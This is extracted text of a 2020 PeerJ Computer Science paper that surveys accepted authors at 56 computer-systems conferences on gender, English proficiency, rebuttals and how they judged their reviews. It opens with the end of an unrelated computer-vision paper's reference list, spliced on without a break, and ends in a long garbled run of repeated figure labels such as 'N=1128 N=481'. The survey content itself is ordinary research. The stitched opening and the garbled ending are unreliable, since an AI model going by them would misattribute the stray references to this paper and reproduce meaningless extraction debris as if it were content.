IEEE Conference on Computer Vision and Pattern Recognition, pp. 1-8, 2005. [4] Qiang Zhu, Shai Avidan, Mei Chen Yeh, and Kwang Ting Cheng, “Fast human detection using a cascade of histograms of oriented gradients,” Proc.IEEE international Conference on Computer Vision and Pattern Recognition, 2006. [5] Suard F, Akotomamonjy A R, Bensrhair A, etal, “Pedestrain Detection Using Infrared Images and Histograms of Oriented Gradients,” Proceedings Intelligent Vehicle Symposium, pp. 206-212, 2006. [6] Felzenszwalb P F, Huttenlocher D P, “Efficient Graph-Based Image Segmentation,” Internatinal Journal of Computer Vision, vol.59, pp. 167-181, 2004. [7] Humayun A, Li F, Rehg J M. RIGOR, “Reusing Inference in Graph Cuts for Generating Object Regions,” Proc.IEEE Computer Vision and Pattern Recognition, pp. 336-343, 2014. [8] Vapnik V N, “ The nature of statistical learning theory,” Springer-Verlag, New York , pp. 37-69, 1995. [9] Guo Mingwei, ZhaoYuzhou, Xiang Junping, etal, “A Survey of Target Detection Algorithms Based on Support Vector Machine,” Control and Decision, vol. 29, pp. 192-200, 2014. [10] Zhang Han, He Dongjian, “An Image Segmentation Method Based on Texture Information and Graph Theory,” Computer Science and Engineering, vol. 50, pp. 180-184, 2014. [11] Zhai Jiyou, Zhuang Yan, “Significant Detection of Boundary Prior and Adaptive Region Merging ,” Computer Engineering and Application, 2017. [12] Chen Shanchao, Fu Hongguang, Wang Ying, “Application of An Improved Graph Segmentation method in Tongue Image Segmentation,” Computer Engineering and Application, vol. 48, pp. 201-203, 2012. [13] Yan Yu, Song Wei, “Color and Texture Mixed Descriptor Image Retrieval Method,” Computer Science and Exploration, PP. 1-8, 2016. [14] Ye Qing, Hu Changbiao, “An improved Image Segmentation Method Based on Graph Theory,” Computer and Modernization, vol. 253, pp. 64-67, 2016. [15] Sande K E A V D, Uijlings J R R, Gevers T, etal, “Segmentation as selective search for object recognition,” International Conference on Computer Vision. IEEE Computer Society, pp. 1879-1886, 2011. [16] Girshick R, Donahue J, Darrell T, etal, “Rich Feature Hierarchies for Accurate Object Detection and Semantic Segmentation,” Computer Science, pp. 580-587, 2014. [17] Wang Ping, Wei Zheng, Cui Weihong, “A Minimum Spanning Tree Image Segmentation Criterion Based on Statistical Learning Theory,” Information Science Edition, Journal of Wuhan University, vol. 42, pp. 878-883, 2017. [18] Belhumeur P, Kriegman D, “Eigenfaces vs. Fisherfaces: Recognition Using Class Specific Linear Projection,” IEEE Transactions on Pattern Analysis and Machine Intelligence, vol.19, pp.711-720, 1997. work_kt5jsmzxpfef3fivjs6s6tzd4m ---- Submitted 4 May 2020 Accepted 29 August 2020 Published 28 September 2020 Corresponding author Eitan Frachtenberg, eitan@reed.edu Academic editor Daniel Katz Additional Information and Declarations can be found on page 19 DOI 10.7717/peerj-cs.299 Copyright 2020 Frachtenberg and Koster Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS A survey of accepted authors in computer systems conferences Eitan Frachtenberg and Noah Koster Department of Computer Science, Reed College, Portland, OR, United States of America ABSTRACT Computer Science researchers rely on peer-reviewed conferences to publish their work and to receive feedback. The impact of these peer-reviewed papers on researchers’ careers can hardly be overstated. Yet conference organizers can make inconsistent choices for their review process, even in the same subfield. These choices are rarely reviewed critically, and when they are, the emphasis centers on the effects on the technical program, not the authors. In particular, the effects of conference policies on author experience and diversity are still not well understood. To help address this knowledge gap, this paper presents a cross-sectional study of 56 conferences from one large subfield of computer science, namely computer systems. We introduce a large author survey (n=918), representing 809 unique papers. The goal of this paper is to expose this data and present an initial analysis of its findings. We primarily focus on quantitative comparisons between different survey questions and comparisons to external information we collected on author demographics, conference policies, and paper statistics. Another focal point of this study is author diversity. We found poor balance in the gender and geographical distributions of authors, but a more balanced spread across sector, experience, and English proficiency. For the most part, women and nonnative English speakers exhibit no differences in their experience of the peer-review process, suggesting no specific evidence of bias against these accepted authors. We also found strong support for author rebuttal to reviewers’ comments, especially among students and less experienced researchers. Subjects Computer Architecture, Databases, Distributed and Parallel Computing, Social Computing, Operating Systems Keywords Computer Systems, Author survey, Researcher Diversity, Peer Review INTRODUCTION Peer review is a cornerstone of modern scientific research. However, understanding and improving this process is challenging because it can be hard to experiment with peer review (Beverly & Allman, 2013; Ernst & Resch, 1994; Mahoney, 1977; McNutt et al., 1990). For example, reputable conferences disallow parallel submissions, and even within the same conference, we cannot design an experiment where papers are reviewed multiple times with fully controlled variations. Perhaps the closest a study came to being a controlled experiment recently was a study on the NIPS 2014 conference, which found high inconsistency in the review outcomes (Lawrence & Cortes, 2014). Thus, decisions on peer-review policies are often based more on the opinions of editors or program chairs, How to cite this article Frachtenberg E, Koster N. 2020. A survey of accepted authors in computer systems conferences. PeerJ Comput. Sci. 6:e299 http://doi.org/10.7717/peerj-cs.299 https://peerj.com/computer-science mailto:eitan@reed.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.299 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.299 1Despite its large research output and enormous economic impact, we found no consensus definition for the field of ‘‘systems’’. For the purposes of this paper, we define it to be the study of computer hardware and software components, which includes research in operating systems, computer architectures, databases, parallel and distributed computing, and computer networks. and less on facts, despite their impact on the perceived integrity of the process (Jamieson et al., 2019). Additionally, many authors find the peer-review process inconsistent and somewhat arbitrary (François, 2015; Lawrence & Cortes, 2014). Both conference organizers and the authors who publish in them could benefit from more data on the process. This article presents data and evidence from statistical observations on the peer-review process for a specific year (2017) and a specific subfield of computing (computer systems or ‘‘systems’’).1 Like most subfields of computer science (CS), the primary channel for publishing research results in systems is peer-reviewed conferences (Fortnow, 2009; Franceschet, 2010; Vardi, 2009). Many conference policies are similar, such as requiring a minimum of three blind reviews per paper (where the identity of the specific reviewers is hidden from authors). However, conferences can vary considerably in other aspects, such as double-blind reviews, rebuttals, two-phase reviews, etc. These decisions can potentially have dramatic effects on both the quality of the conference and the experience of the authors, but there appear to be conflicting opinions on the effects and tradeoffs of these policies (Mainguy, Motamedi & Mietchen, 2005). The primary goal of this paper therefore is to analyze the conference author’s experience. Its main contribution is an exposition and description of a large-scale author survey of systems researchers. These data could be especially relevant to two groups of people: (1) computer scientists working to better understand the publication process and its effect on their careers and (2) conference chairs wishing to understand the effect of their policies on author experience and diversity. A secondary goal of this paper is to investigate how the diversity of the respondents affected their survey answers. To this end, we combine our survey data with external data to assess author diversity and potential biases. Specifically, we look at gender, English proficiency, research experience, and geography. By limiting our scope to conferences in a single subfield, we avoid some variability that might occur across a broader range of disciplines. This important subfield is known for poor gender diversity (DeStefano, 2018; Fox, 2006; Frachtenberg & Kaner, 2021; Mattauch et al., 2020), which gives us a lens by which we can examine any magnified effects of review policy on diversity. Despite this focus on systems, we aimed to analyze a large population to increase the statistical validity and robustness of our measurements. Our complete set includes data from 56 conferences, 2,439 papers, 8,193 authors, and 918 survey respondents. To the best of our knowledge, this is the first cross-sectional survey of authors across systems conferences. Past studies have concentrated on either wide journal authorship (Editage Insights, 2018; Clarivate Analytics, 2018; Sense about Science, 2019; Solomon, 2014) or a single conference (Beverly & Allman, 2013; Daume, 2015; Papagiannaki, 2007; Parno, Erlingsson & Enck, 2017). We contrast these works with our findings throughout our study. As an initial exploratory study of the survey, we did not set out to validate specific hypotheses. Nevertheless, there are several research questions for which our data can provide clues and answers across the entire field of systems: Frachtenberg and Koster (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.299 2/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.299 • What are the demographic properties (position, gender, country, English proficiency) of survey respondents? • Are these demographics, and especially the low number of women, representative of all accepted authors? • How long does a systems paper take to write? How many attempts does it take to publish? • How do authors feel about a rebuttal process? What explains differences in opinions? • How do authors evaluate reviews, and which factors affect these evaluations? • What are the grade distributions of accepted papers across different categories? • What are the differences to survey responses for authors of different genders, English proficiency, and publication experience? Organization The next section discusses our methodology and limitations of the survey data. The Results section describes the survey and is organized around the areas of the survey itself. Each subsection lists the survey questions in order, describes the statistics of the responses, and then includes a concise discussion or correlation analysis as applicable. As an initial analysis of the survey, the Discussion section delves into questions of author diversity for which we have data. We believe that the wealth of this dataset leaves more questions unanswered than this expository paper allows, and we discuss some of our future work in the final section. As an additional contribution, most of our data and source code, except for individual survey responses, is available on http://github.com/eitanf/sysconf. MATERIALS AND METHODS Before issuing our survey, we collected data from various external sources to complement and corroborate its findings, starting with the conferences themselves. We selected 56 conferences from systems and related areas. These peer-reviewed conferences include some of the most prestigious in the field, as well as others for comparison. They vary in scope and size (from 7 to 151 papers), but all are rigorously peer-reviewed and all are from 2017. The complete list of conferences is given in Table 1. For each conference we collected data from the Web and program committee (PC) chairs, including review policies, important dates, the composition of its technical PC, and the number of submitted papers. We also collected historical metrics from the Institute of Electrical and Electronics Engineers (IEEE), Association for Computing Machinery (ACM), and Google Scholar (GS) websites, including past citations, age, and total publications, and downloaded all 2,439 papers. From the conference and paper text, we compiled the complete list of authors for all 56 conferences (a total of 8,193 unique authors), as well as their email addresses. These addresses were used not only for the survey’s distribution but also to infer an author’s affiliation, sector, and country of residence. If an email address was not shown in the paper, we attempted to infer the authors’ affiliation from their GS profile when uniquely identifiable. These profiles also provide indirect metrics on the authors’ research experience, such as their H-index (Hirsch, 2005). Finally, we also manually Frachtenberg and Koster (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.299 3/23 https://peerj.com http://github.com/eitanf/sysconf http://dx.doi.org/10.7717/peerj-cs.299 Table 1 Conferences in our dataset with their start date, double-blind policy, number of accepted papers, acceptance rate, and survey response rate by papers. Name Date Blind Papers Acceptance Response Name Date Blind Papers Acceptance Response ASPLOS 2017-04-08 Yes 56 18% 41% ISC 2017-06-18 Yes 22 33% 45% ATC 2017-07-12 No 60 22% 22% ISCA 2017-06-24 Yes 54 17% 31% CCGrid 2017-05-14 No 72 25% 14% ISPASS 2017-04-24 Yes 24 30% 38% CCS 2017-10-31 Yes 151 18% 32% KDD 2017-08-15 No 64 9% 28% CIDR 2017-01-08 No 32 41% 41% MASCOTS 2017-09-20 No 20 24% 25% CLOUD 2017-06-25 No 29 26% 28% MICRO 2017-10-16 Yes 61 19% 41% Cluster 2017-09-05 No 65 30% 20% Middleware 2017-12-11 Yes 20 26% 35% CoNEXT 2017-12-13 No 32 19% 31% MobiCom 2017-10-17 Yes 35 19% 49% EuroPar 2017-08-30 No 50 28% 34% NDSS 2017-02-26 Yes 68 16% 54% EuroSys 2017-04-23 Yes 41 22% 39% NSDI 2017-03-27 Yes 42 16% 21% FAST 2017-02-27 Yes 27 23% 52% OOPSLA 2017-10-25 Yes 66 30% 12% HCW 2017-05-29 No 7 47% 29% PACT 2017-09-11 Yes 25 23% 24% HiPC 2017-12-18 No 41 22% 37% PLDI 2017-06-18 Yes 47 15% 32% HotCloud 2017-07-10 No 19 33% 58% PODC 2017-07-25 No 38 25% 26% HotI 2017-08-28 No 13 33% 0% PODS 2017-05-14 No 29 29% 24% HotOS 2017-05-07 No 29 31% 34% PPoPP 2017-02-04 Yes 29 22% 48% HotStorage 2017-07-10 No 21 36% 29% SC 2017-11-14 Yes 61 19% 41% HPCA 2017-02-04 No 50 22% 54% SIGCOMM 2017-08-21 Yes 36 14% 50% HPCC 2017-12-18 No 77 44% 29% SIGIR 2017-08-07 No 78 22% 29% HPDC 2017-06-28 No 19 19% 37% SIGMETRICS 2017-06-05 Yes 27 13% 30% ICAC 2017-07-18 No 14 19% 36% SIGMOD 2017-05-14 Yes 96 20% 31% ICDM 2017-11-19 Yes 72 9% 26% SLE 2017-10-23 No 24 42% 4% ICPE 2017-04-22 No 29 35% 41% SOCC 2017-09-25 No 45 Unknown 36% ICPP 2017-08-14 No 60 29% 25% SOSP 2017-10-29 Yes 39 17% 59% IGSC 2017-10-23 No 23 Unknown 35% SP 2017-05-22 Yes 60 14% 38% IISWC 2017-10-02 Yes 31 37% 45% SPAA 2017-07-24 No 31 24% 26% IMC 2017-11-01 No 28 16% 50% SYSTOR 2017-05-22 No 16 34% 12% IPDPS 2017-05-29 No 116 23% 28% VEE 2017-04-09 Yes 18 42% 44% Frachtenberg and K oster (2020),P eerJ C om put. S ci.,D O I10.7717/peerj-cs.299 4/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.299 2We recognize that gender is a complex, nonbinary identity that cannot be captured adequately by just photos or pronouns. However, the focus of this study is on perceived gender, not self-identification, which is often judged by the same simplistic criteria. assigned the gender of 97.1% of authors, by looking up their photos and pronouns on the web.2 We sent our survey to all 5,919 valid email addresses during the summer of 2018, and 918 authors responded. We asked a few demographic questions, as well as questions about their paper and about the review process, repeated for up to three distinct papers from our dataset. Nonresponses to a question were marked as NA. Of the 809 papers, 161 had responses from multiple authors. Response rates by paper varied considerably among different conferences but appear to be positively correlated with the median number of authors per paper (Pearson’s r =0.37, p=0.0055). In other words, the more coauthors per paper, the more likely it was that at least one author would respond and represent that paper. The distribution of responses per paper was statistically similar to the distribution of coauthors per paper (t =23.54, p < 0.001), suggesting that authors were equally likely to respond to the survey, regardless of the paper. Survey responses from different authors to the same paper were typically identical or very similar, and always tested statistically insignificant in aggregate. In five papers, the responses from different authors were so inconsistent across questions that we elided them from our data. These inconsistencies relate mostly to the paper’s history, whereas responses to most other questions remain consistent across respondents. Limitations Our methodology involves several limitations and tradeoffs worthy of mention. First, by focusing only on systems, we may be limiting the applicability of our findings to this subfield. By focusing on a single year, we cannot report trends. These choices were deliberate, to eliminate extraneous variability in our data. Second, our survey is subject to selection bias (representing only authors who responded to the survey or to each question). Since we found no statistically significant demographic differences between survey respondents and the group of all authors, we believe the effect of this bias is minimal (see also Daume, 2015; Papagiannaki, 2007). Third, the effort involved in compiling all of the data in preparation for the survey took nearly a year, by which time some authors reported difficulty recalling some details, leading to fewer responses. Fourth, the manual assignment of genders is a laborious process, prone to human error. However, automated approaches based on first names and country can have even higher error rates and uncertainty, especially for female and Asian names (Huang et al., 2019; Karimi et al., 2016; Mattauch et al., 2020). In fact, for the 786 respondents who provided a binary gender, we found no disagreements with our manual gender assignments. Last, but certainly not least, is survivorship bias. Since we only polled authors of accepted papers, we have no information on all submitted papers. Our survey data is insufficient to distinguish between the demographics of accepted and rejected authors, which leaves the door open to undetected biases in the peer-review process. That said, we found no difference in the demographics of accepted papers between otherwise similar conferences with double-blind or single-blind review policies. This indirect evidence reduces the likelihood that the demographic section of the survey would be answered differently for rejected papers. Other survey sections on paper history and review process may prove more Frachtenberg and Koster (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.299 5/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.299 sensitive to survivorship bias. We therefore limit any conclusions we draw in this study to accepted authors only. Even with this restriction, it can be instructive to compare the responses across different demographics within accepted authors. We found very few controlled studies that evaluate the peer-review process on both accepted and rejected papers, and they are typically limited in scope to one conference or journal (Parno, Erlingsson & Enck, 2017; Tomkins, Zhang & Heavlin, 2017). We chose an observational approach instead, which lets us examine an entire field of study, but at the cost of survivorship bias and experimental control. We believe both approaches to be complementary and valuable. Ethics statement This study and the survey questions were approved by the Reed College IRB (number 2018-S13). As an opt-in email survey, participants could choose to share their responses with us after they were informed of the questions and the purpose of the survey. All of the individual responses have been anonymized. The data that is shared in the supplementary material was collated and collected from publicly available sources on the Web. AUTHOR SURVEY RESULTS Demographic questions We asked three demographic questions to evaluate their role in the review experience. We intentionally kept these questions to a minimum to reduce the risk of priming or selection bias. Which best describes your position during 2017? As shown in Table 2, about one-third (36.2%) of the respondents were students in 2017, another third or so were professors of various ranks (34%), and the rest were distributed between all other categories, including unknown. For comparison, we looked at the inferred affiliation of 7,026 total authors with an identifiable email affiliation. Of these, 13.9% had an industry affiliation, compared to 13.6% of the non-NA survey respondents (χ2=0.059, p=0.807). The difference for government researchers is a little larger: 4.8% by affiliation vs. 6.4% among survey respondents, but still not significant enough to suggest selection bias by position (χ2=2.977, p=0.0845). Systems is a field with numerous practical applications and commercial implications. It is not surprising therefore to find a large proportion of researchers in industrial and government positions, contributing to author diversity across sectors. What is your gender? Among those who provided a binary response, 10.5% chose ‘‘Female’’ (Table 3). In our manually assigned gender data of all of the authors, 11% were female. These two proportions are not statistically different (χ2=0.156, p=0.693), leading us to believe that significant selection bias by gender is unlikely. Frachtenberg and Koster (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.299 6/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.299 Table 2 Distribution of respondent positions. Response Count Ratio Government Researcher 41 4.5% Industry Researcher 115 12.7% Professor 114 12.6% Associate Professor 71 7.8% Assistant Professor 124 13.7% Postdoctoral Researcher 35 3.9% Student 329 36.2% Other 19 2.1% NA 60 6.6% Table 3 Respondents’ gender. Response F M Other NA Count 83 703 4 112 Ratio 9.2% 77.9% 0.4% 12.4% Table 4 Months of research. Response 1–3 4–6 7–9 10–12 13+ NA Count 42 162 119 126 164 191 Ratio 5.2% 20.1% 14.8% 15.7% 20.4% 23.8% What is your English level proficiency? Of the 848 non-NA respondents, 31% of respondents chose ‘‘Native’’ for their English level proficiency. There appears to be no gender or position difference in the response to this question. We also asked (and checked) for each paper whether there was any native English speaker among its coauthors. From this question, we estimate that approximately 54% of papers had at least one native-speaking author. Paper history How many months did it take to research and write? The responses to this question (Table 4) exhibited more variance among different coauthors of the same paper than any other question, although typically by no more than 3 months. The response to this question was not significantly associated with the team size (number of coauthors) or lead author’s experience, gender, or sector. How many conferences/journals was it submitted to prior to this publication? It is instructive to see that at least 40% of papers with responses had been rejected at least once (Solomon, 2014; Wallach, 2011), with one respondent taking as many as 12 attempts to reach publication (Table 5). We also observed a tendency of papers with a Frachtenberg and Koster (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.299 7/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.299 Table 5 Number of paper’s prior submissions. Response 0 1 2 3 4 5+ NA Count 353 153 65 27 8 7 191 Ratio 43.9% 19% 8.1% 3.4% 1% 0.9% 23.8% Figure 1 Prior submission counts for architecture conferences. Arrows show in relative thickness and attached number how many papers that had been rejected in the top row’s conference were accepted in the bottom row’s conference. For example, 6 papers that had been rejected from ISCA were accepted to HPCA in 2017, out of the 28 HPCA’17 papers for which we have responses. Full-size DOI: 10.7717/peerjcs.299/fig-1 longer submission history of having a longer research history (previous question), perhaps conflating the two variables in respondents’ mind. Please type in their names [of the rejecting conferences] Because of the unstructured responses to this question, quantitative analysis is challenging. As an example, we focus our attention on the area of computer architecture alone. Four of the leading conferences are represented in our dataset and are of similar size and acceptance rates. We note that most papers that had been previously rejected from these conferences, had been mostly submitted to one of these four as well. As Fig. 1 shows, these relationships work both ways, meaning that many papers were accepted after previously being rejected from equivalent (or even the very same) conferences. This fact can be interpreted both positively and negatively. Some respondents expressed frustration that the peer-review process can appear arbitrary (Anderson, 2008; François, 2015; Gans & Shepherd, 1994; Lawrence & Cortes, 2014; Vardi, 2009; Vines, 2011). Other authors opined that effective peer review provides feedback that improves the paper for the next submission. Most of the papers had been rejected at least once prior to their acceptance in 2017, which perhaps helps to explain why authors’ views on the process were mixed. This fact could also support an argument that selection bias in this survey played a lesser role in painting authors’ reported experience one way or another, because even though these are all accepted authors, most of them experienced the rejection of the subject paper as well. Frachtenberg and Koster (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.299 8/23 https://peerj.com https://doi.org/10.7717/peerjcs.299/fig-1 http://dx.doi.org/10.7717/peerj-cs.299 Rebuttal process Did the conference allow you to address reviewers concerns before final acceptance notice? Of the 710 non-NA responses, 57.3% chose ‘‘Yes.’’ Contrast this with the conferences, of which only 18 offered a formal rebuttal option (33.9% when weighted by papers). The discrepancy may be explained by some authors who specifically explained answering ‘‘Yes’’ to this question despite the lack of a formal rebuttal policy, because the conference had a ‘‘provisional acceptance’’ policy or mandatory revisions guided by a PC ‘‘shepherd.’’ Although this response type is clearly different than a formal rebuttal, limiting our analysis to only formal rebuttals does not meaningfully change our results. Approximately 96.45% of the ‘‘Yes’’ respondents also reported that they took advantage of the rebuttal option. The few who did not take advantage received higher overall acceptance score on average, (83.3% vs. 66.2%, t =−1.6, p=0.18), possibly obviating the need to rebut (Daume, 2015). There were no statistically significant differences in responses to this question by position, English proficiency, or gender, although only men chose not to rebut (16 authors, χ2=0.911, p=0.34). These 16 men appear slightly less experienced than their peers, with a median H-index of 8, compared to 10 for all authors, (t =−1.408, p=0.184) and are mostly academics (12 authors). However, the group is probably too small to characterize it conclusively. Did you find the response process helpful? Of the non-NA responses, 89.7% were affirmative. This high percentage may be a little surprising, considering how many PC chairs and authors alike commented privately on how little difference rebuttals make (Daume, 2015; Shah et al., 2018). One cautionary reminder is that the survey and statistics exclude rejected papers, which could lead to survivorship bias. It is quite plausible that authors of rejected papers were less enthused about the rebuttal process. However, even among authors of accepted papers there are some noteworthy differences between those who found rebuttals valuable and those who did not. Professors comprise only 35% of the respondents who found rebuttals helpful, compared to 53% among those who did not (χ2 =5.44, p=0.02). In contradistinction, students found rebuttals more helpful (42% vs. 17%, χ2 =10.36, p=0.0013), perhaps because of their lack of experience. Junior researchers possibly also feel more pressure to bring their paper to publication than tenured and senior researchers. More generally, the experience level of authors who found rebuttals helpful, as measured by median publications count in their GS profile, is about half that of those who did not (23 vs. 43, t =1.55, p=0.13). We have also collected information on which authors serve on PCs in any of our conferences, as another measure of experience. This information agrees with the previous metric. Authors satisfied with the rebuttal process serve on an average of 0.3 PCs, compared to 0.6 PCs for authors who were not (t =1.89, p=0.066), which is consistent with the mixed opinions we got directly from PC chairs on the question of rebuttals. Frachtenberg and Koster (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.299 9/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.299 Table 6 Number of reviews received per paper. Response 0 1 2 3 4 5 6+ NA Count 2 1 5 206 204 167 65 154 Ratio 0.2% 0.1% 0.6% 25.6% 25.4% 20.8% 8.1% 19.2% Nonnative English speakers were also more likely to find the rebuttals helpful (92% vs. 85%, χ2 =4.741, p=0.0294), perhaps because it allowed them to address gaps in communication. This difference also extends weakly to the entire team: 91% of responses where no team member was a native English speaker found the rebuttal helpful, vs. 89% in responses from the other teams. Rebuttal helpfulness does appear to be related to the conference. When limiting ourselves to the eleven conferences that had a formal rebuttal process and at least ten unique authors responding to this question, three conferences had higher-than-average dissatisfaction rate with the rebuttal process: ASPLOS, ISC, and SOSP. Conversely, in four conferences, no more than 8% of respondents were dissatisfied with the rebuttals: MICRO, PPoPP, SC, and PLDI. When asked to explain their previous answer, the respondents varied. The main themes that emerged from the positive responses were that rebuttals allowed for clarifications, increased review scores, and improved the communication of specific points in the paper. One PC chair also thought rebuttals elicit better initial reviews and better PC discussion. The main negative themes were that rebuttals rarely change reviewers’ minds and that the process was still opaque and arbitrary. Review quality assessment The following questions, one per review and paper, were designed to assess the quality of the reviews. How many reviews did this paper receive? The papers in our dataset average more than four reviews per paper (Table 6), far better than the typical 2+ reviews in an average CS journal (Clarivate Analytics, 2018, p. 21). This could partially explain the attractiveness of conferences over journals, at least in systems. Authors were also asked to qualitatively approximate how long each review was (Table 7). It is encouraging to find over half of the non-NA responses showing one or more pages per review, whereas only approximately 15.9% of reviews were reported to be less than half a page. How well did the reviewer understand the paper, in your estimation? Of the minority of reviews that missed major points or worse (Table 8), 59.7% were short, spanning half a page or less. This correlation demonstrates the relationship between review quality and length (χ2 =55.325, p < 0.0001) (Hames, 2008; Papagiannaki, 2007). Still, longer is not always better or necessary, as these short reviews still comprise 40.9% of the ‘‘perfect understanding’’ reviews, whereas multipage reviews only comprise 15.3%. As for paper history, the better-understood papers appear to have had a longer history in terms of prior submissions (t =2.49, p=0.014), as well as in terms of months researched. Frachtenberg and Koster (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.299 10/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.299 Table 7 Distribution of review lengths. Response Count Ratio 1-2 Paragraphs 51 6.3% Half a Page 118 14.7% A Page 181 22.5% Multiple Pages 65 8.1% NA 389 48.4% Table 8 Reviewer understanding. Response Count Ratio Perfectly 570 30.1% Missed some minor points 684 36.1% Misunderstood major points 105 5.5% Probably didn’t read it 14 0.7% NA 520 27.5% Table 9 Review helpfulness. Response Count Ratio Very helpful 465 34.1% Somewhat helpful 718 52.7% Not at all 180 13.2% Conceivably, previous rejections have helped improve the communication of a resubmitted paper. How helpful did you find this review for improving the paper? Table 9 shows that accepted authors found most of their reviews at least somewhat helpful. The helpfulness of a review is closely linked to its reported level of understanding (χ2=284.53,p<0.001), which in turn also implies that it is closely linked to the review’s length (χ2=267, p<0.001). This result is consistent with other surveys of journal authors (Editage Insights, 2018; Sense about Science, 2019). How fair would you say the review was? Fairness in reviews is a high priority for the systems community (Jerger et al., 2017), and most of our respondents thought their reviews were fair (Table 10). Once more, the perception of a review’s fairness is closely tied to that of the reviewer’s understanding (χ2=766.81, p<0.001) and helpfulness (χ2=281.64, p<0.001). Only 52 of non-NA responses (3.85%) ranked a review as ‘Unfair’ or ‘Very unfair.’ However, this relatively low number may be distorted by survivorship bias more than for any other question in this survey. Of these responses, SOSP stands out as the conference with most ‘Unfair’ reviews (5, or 7.58%) and ICPE as the conference with the highest percentage (2, or 28.57%). One other notable aspect of these negative responses is that only one came from a woman (1.9%). Frachtenberg and Koster (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.299 11/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.299 Table 10 Review fairness. Response Count Ratio Fair 1019 75.4% Somewhat fair 280 20.7% Unfair 49 3.6% Very unfair 3 0.2% Review scores We asked respondents to upload their reviews’ text or to fill in the actual scores that they received in the reviews of up to six reviews per paper and in seven different categories, when applicable. Not all of the conferences require all categories in their review forms, and the conferences do not all use consistent wording, so we chose whichever one of the seven categories appeared closest in meaning to the conference’s form. These categories generally stand for the following: 1. Overall score or acceptance recommendation (often ranging from ‘‘strong reject’’ to ‘‘strong accept’’). 2. Technical merit or validity of the work. 3. Presentation quality, writing effectiveness, and clarity. 4. Foreseen impact of the work and potential to be of high influence. 5. Originality of the work, or conversely, lack of incremental advance. 6. Relevance of the paper to the conference’s scope. 7. Confidence of the reviewer in the review. All scores were normalized so that the lowest grade in a category always received 0 and the highest always 1. The distributions of these normalized scores are depicted in Fig. 2. Keep in mind, however, that the transcription of reviews, scaling, and calibration process were error-prone, possibly introducing some noise to these responses. Not surprisingly, all of the papers average above 50% for all of the scores—after all, the papers have all been accepted (Langford, 2012; Vines, 2011). The interquartile range for the overall grade is 0.5–0.75, meaning that half of the papers probably got accepted with an overall recommendation somewhere between ‘‘weak accept’’ and ‘‘accept.’’ Perhaps more surprisingly, approximately 10% of the papers were accepted despite a low (<0.5 average) acceptance recommendation, and approximately 21% of the accepted papers had low reviewer confidence (<0.5 average). However, the confidence ranking may be related to the seniority of the reviewer rather than the quality of the paper itself, leading to wider variance (Shah et al., 2018). It is illuminating to see that there is no correlation between a paper’s overall grade and the number of past rejections (r =−0.07, p=0.016). If multiple submissions do indeed improve a paper’s quality, as we suggested in the understanding question, they appear to only bring it to the same level of evaluation as other accepted papers in the same conference. Once the paper is accepted, the improvement process is presumably halted. Another observation is that the ‘‘relevance’’ grade may be mostly irrelevant, both because of its narrow distribution, and because of the low number of conferences that ask for it. Frachtenberg and Koster (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.299 12/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.299 N=1128 N=481 N=552 N=915N=1128 N=481 N=552 N=915N=1128 N=481 N=552 N=915N=1128 N=915N=1128 N=915N=1128 N=915N=1128 N=915N=1128 N=481 N=487 N=411 N=552 N=312 N=915N=1128 N=481 N=487 N=411 N=552 N=312 N=915N=1128 N=481 N=487 N=411 N=552 N=312 N=915N=1128 N=411 N=915N=1128 N=411 N=915N=1128 N=411 N=915N=1128 N=411 N=915N=1128 N=915N=1128 N=915N=1128 N=915N=1128 N=481 N=487 N=411 N=552 N=915N=1128 N=481 N=487 N=411 N=552 N=915N=1128 N=481 N=487 N=411 N=552 N=915N=1128 N=481 N=487 N=411 N=552 N=915N=1128 N=481 N=487 N=411 N=552 N=915N=1128 N=481 N=487 N=411 N=552 N=915N=1128 N=481 N=487 N=411 N=552 N=915N=1128 N=481 N=487 N=411 N=552 N=915N=1128 N=481 N=487 N=411 N=552 N=915N=1128 N=481 N=487 N=411 N=552 N=915N=1128 N=481 N=487 N=411 N=552 N=915N=1128 N=481 N=487 N=411 N=552 N=915N=1128 N=487 N=552 N=915N=1128 N=487 N=552 N=915N=1128 N=487 N=552 N=915N=1128 N=487 N=552 N=915N=1128 N=487 N=552 N=915N=1128 N=915N=1128 N=915N=1128 N=915N=1128 N=915N=1128 N=915N=1128 N=915N=1128 N=481 N=487 N=411 N=552 N=312 N=915N=1128 N=481 N=487 N=411 N=552 N=312 N=915N=1128 N=481 N=487 N=411 N=552 N=312 N=915N=481 N=411 N=552 N=312 N=915N=481 N=411 N=552 N=312 N=915N=481 N=411 N=552 N=312 N=915N=481 N=411 N=552 N=312 N=915N=481 N=411 N=552 N=312 N=915N=1128N=1128N=1128N=1128 N=487 N=552 N=915N=1128 N=487 N=552 N=915N=1128 N=487 N=552 N=915N=1128 N=487 N=552 N=915N=1128 N=487 N=552 N=915N=1128 N=481 N=487 N=411 N=552 N=312 N=915N=1128 N=481 N=487 N=411 N=552 N=312 N=915N=1128 N=481 N=487 N=411 N=552 N=312 N=915N=1128 N=481 N=487 N=411 N=552 N=312 N=915N=1128 N=481 N=487 N=411 N=552 N=312 N=915N=1128 N=481 N=487 N=411 N=552 N=312 N=915N=1128N=1128N=1128N=1128N=1128 N=481 N=487 N=411 N=552 N=312 N=915N=1128 N=481 N=487 N=411 N=552 N=312 N=915N=1128 N=481 N=487 